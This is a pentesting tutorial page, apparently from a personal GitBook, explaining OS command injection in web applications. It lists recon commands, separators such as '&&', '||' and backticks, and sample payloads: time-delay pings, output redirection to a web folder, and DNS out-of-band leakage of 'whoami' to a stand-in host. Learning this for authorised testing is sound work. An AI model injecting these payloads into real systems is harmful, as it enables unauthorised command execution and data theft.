🚩
Cyber Explained
  • WHOAMI
  • Technologies
    • Docker
      • Setup Docker
      • Terminology
      • Docker Hub
      • Docker Images
      • Docker Containers
      • Working with Containers
      • Virtualization vs Containerization
      • Nutshell
      • Troubleshoot
    • Android Application
      • Application File Structure
      • Layout and Resources for UI
      • Activities
      • Intents
      • Activity lifecycle and state
      • Implicit intents
    • Active Directory
      • Attacking Active Directory: 0 to 0.9
      • Resources
    • Kerberos
  • RED TEAMING
    • Attacking Kerberos
      • User Enum and Brute Force
      • AS-REP Roasting
      • Kerberoasting
    • MITRE ATT&CK
    • Resources
  • PenTesting
    • Android Pentesting
      • Re-Build App
      • Using Frida on Android without root
    • Web Pentesting
      • XSS
      • SQLi
      • Authentication Vulnerabilities
      • Session Security
      • CSRF
      • Path Traversal
      • File Inclusion
      • Business Logic Vulnerabilities
      • HTTP Host header attacks
      • SSRF
      • HTTP Request Smuggling
      • OS command injection
      • Access control vulnerabilities
    • OWASP Testing Guide
      • 1.0 Information Gathering
      • 2.0 Configuration and Deployment Management Testing
      • 3.0 Identity Management Testing
      • 4.0 Authentication Testing
      • 5.0 Authorization Testing
      • 6.0 Session Management Testing
      • 7.0 Input Validation Testing
      • 8.0 Testing for Error Handling
      • 9.0 Testing for Weak Cryptography
      • 10.0 Business Logic Testing
      • 11.0 Client-side Testing
      • 12.0 API Testing
  • Programming
    • Python
      • Hello World !
        • Variables and Data Types
        • Lists, Tuple, Sets and Dictionaries
        • If Statement
        • While Loops
        • For Loops
        • Functions
        • Classes and Objects
        • Creating Modules
        • Creating Packages
        • Exception Handling
      • System Pogramming
        • File Handling
        • OS Interaction with OS Library
        • Multithreading
        • Signals
        • Subprocess
        • Code Examples
      • Network Programming
        • Socket Programming
        • Packet Injection with Raw Sockets
        • SocketServer Framework
        • Packet Sniffing with Scapy
        • Creating a Web Server
        • Packet Injection with Scapy
        • Packet Sniffing with Raw Sockets
        • Programming with Scapy
  • Operating Systems
    • Windows*
    • Linux
      • System Structure
      • VI Text Editor
      • Working with the Linux Shell
      • Managing Users and Groups
      • Managing Files and Directories
  • Networks
    • Page 1
Powered by GitBook
On this page
  1. PenTesting
  2. Web Pentesting

OS command injection

Useful commands

Purpose of command

Linux

Windows

Name of current user

whoami

whoami

Operating system

uname -a

ver

Network configuration

ifconfig

ipconfig /all

Network connections

netstat -an

netstat -an

Running processes

ps -ef

tasklist

How to Test this Vulnerability

  • Simple case

    try to add |whoami to the end of parameters go to DB and observe the response

    this case work when website append no defense against this type of attacks

  • Blind OS command injection vulnerabilities

    he application does not return the output from the command within its HTTP response.

    Consider a web site that lets users submit feedback about the site.

    How to detect :

    • Detecting blind OS command injection using time delays

      add ||ping -c 10 127.0.0.1|| if delay executed this parameter vulnerable

    • Exploiting blind OS command injection by redirecting output

      add ||whoami > /var/www/static/whoami.txt|| then search for function which retrieve data from this folder alter the request to whoami.txt

    • Exploiting blind OS command injection using out-of-band (OAST) techniques

      add || nslookup yoursite.com || then check your logs or use burp collab URL

      add ||nslookup+whoami.yoursite.com|| then check your logs or use burp collab URL

Ways of injecting OS commands

A variety of shell metacharacters can be used to perform OS command injection attacks.

A number of characters function as command separators, allowing commands to be chained together. The following command separators work on both Windows and Unix-based systems:

  • &

  • &&

  • |

  • ||

The following command separators work only on Unix-based systems:

  • ;

  • Newline (0x0a or \n)

On Unix-based systems, you can also use backticks or the dollar character to perform inline execution of an injected command within the original command:

`injected command `$( injected command )

Note :

that the different shell metacharacters have subtly different behaviors that might affect whether they work in certain situations, and whether they allow in-band retrieval of command output or are useful only for blind exploitation.

Sometimes, the input that you control appears within quotation marks in the original command. In this situation, you need to terminate the quoted context (using " or ') before using suitable shell metacharacters to inject a new command.

PreviousHTTP Request SmugglingNextAccess control vulnerabilities

Last updated 3 years ago